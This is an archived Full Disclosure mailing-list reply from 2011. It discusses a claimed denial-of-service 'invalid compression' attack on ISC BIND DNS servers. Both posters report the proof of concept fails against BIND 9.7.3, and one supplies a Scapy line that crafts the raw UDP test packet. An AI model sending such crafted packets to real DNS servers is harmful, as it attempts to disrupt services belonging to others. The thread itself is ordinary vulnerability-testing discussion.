Home page logo
  • Nmap Security Scanner
  • Security Lists
  • Security Tools
  • Site News
  • Advertising
  • About/Contact
  • Sponsors:



/

fulldisclosure logo Full Disclosure mailing list archives

Re: Semi 0day DNS Invalid Compression attack
From: Francisco J. Gómez Rodríguez <ffranz () iniqua com>
Date: Thu, 14 Jul 2011 12:27:19 +0200
Proof dont work neither on my own ISC BIND 9.7.3. :-(

By the way, you can use Scapy to create the packet:

a=IP(dst="127.0.0.1")/UDP(sport=RandInt(),chksum=0)/Raw(
load='\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00')

regards...

On Mon, Jul 11, 2011 at 3:31 PM, Kai <kai () rhynn net> wrote:


 Hi,

 tested on isc bind 9.7.3, on opensuse 11.4.
 sent a few packets to myself:

 --> [1000000]: (127.0.0.1)->(127.0.0.1)
 --> Done.

 and named felt beautiful along the test:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 2844 named     20   0  111m  22m 2456 S    0  0.2   0:00.09 named

 named -V:

 BIND 9.7.3 built with '--prefix=/usr' '--bindir=/usr/bin'
 '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--localstatedir=/var'
 '--libdir=/usr/lib' '--includedir=/usr/include/bind'
 '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--with-openssl'
 '--enable-threads' '--with-libtool' '--enable-runidn' '--with-libxml2'
 '--with-dlz-mysql' '--with-dlz-ldap' '--with-gssapi'
 'CFLAGS=-fomit-frame-pointer -fmessage-length=0 -O2 -Wall
 -D_FORTIFY_SOURCE=2 -fstack-protector -funwind-tables
 -fasynchronous-unwind-tables -g -fno-strict-aliasing'
 'LDFLAGS=-L/usr/lib'

 you said that packet was like

# 4500 002b 512f 4000 3411 92a9 2989 601e


 so i've changed packet header to
 "\x45\x00\x00\x2b\x51\x2f\x40\x00\x34\x11\x92\xa9" and length to
 "\x00\x4a" (74, right?) but still no look. Any thoughts?


--
 Cheers,

 Kai

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]